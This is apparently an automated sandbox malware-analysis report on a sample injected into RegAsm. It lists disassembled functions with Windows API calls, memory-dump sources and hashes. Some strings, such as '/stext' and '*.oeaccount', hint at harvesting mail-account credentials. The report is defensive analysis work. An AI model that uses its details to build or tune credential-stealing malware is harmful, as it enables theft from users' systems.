                                                                                                                                                                                • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                                                                                                                                                                                • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                                                                                                                                                                                Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$_strcmpimemset
                                                                                                                                                                                • String ID: /stext
                                                                                                                                                                                • API String ID: 520177685-3817206916
                                                                                                                                                                                • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                Function 00402B22 Relevance: 3.1, APIs: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                  • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1880195650-0
                                                                                                                                                                                • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                                                                                                                                                                                Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                Function 004029A2 Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1208763047-0
                                                                                                                                                                                • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                                                                                                                                                                                Function 00402A9D Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                  • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Closememset$EnumOpen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1938129365-0
                                                                                                                                                                                • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                                                                                                                                                                                • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                                                                                                                                                                                Function 00404734 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 534179979-0
                                                                                                                                                                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4165544737-0
                                                                                                                                                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                Function 00410B62 Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Enum
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2928410991-0
                                                                                                                                                                                • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                                                                                                                                                                                • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                                                                                                                                                                                Function 00410ADD Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3660427363-0
                                                                                                                                                                                • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                                                                                                                                                                                • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                                                                                                                                                                                Function 00407560 Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                                                                                                                                                                                • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                                                                                                                                                                                Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                                                Function 00407CBC Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                                                                                  • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                                                                                • free.MSVCRT ref: 00407D7C
                                                                                                                                                                                  • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$mallocmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3401966785-0
                                                                                                                                                                                • Opcode ID: a1ae40bd3782b748071a2eaf40207b68e6d5397b3c2520726b72686718a28406
                                                                                                                                                                                • Instruction ID: d7b0144154ef41658eb0158d6140425370aaa91bbe4ae82c15578abe9a627f9f
                                                                                                                                                                                • Opcode Fuzzy Hash: a1ae40bd3782b748071a2eaf40207b68e6d5397b3c2520726b72686718a28406
                                                                                                                                                                                • Instruction Fuzzy Hash: DF5148B5D0821AAFCB109F99D4809ADFBB1BF44314B24817BE950B7391C738BE45CB96

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
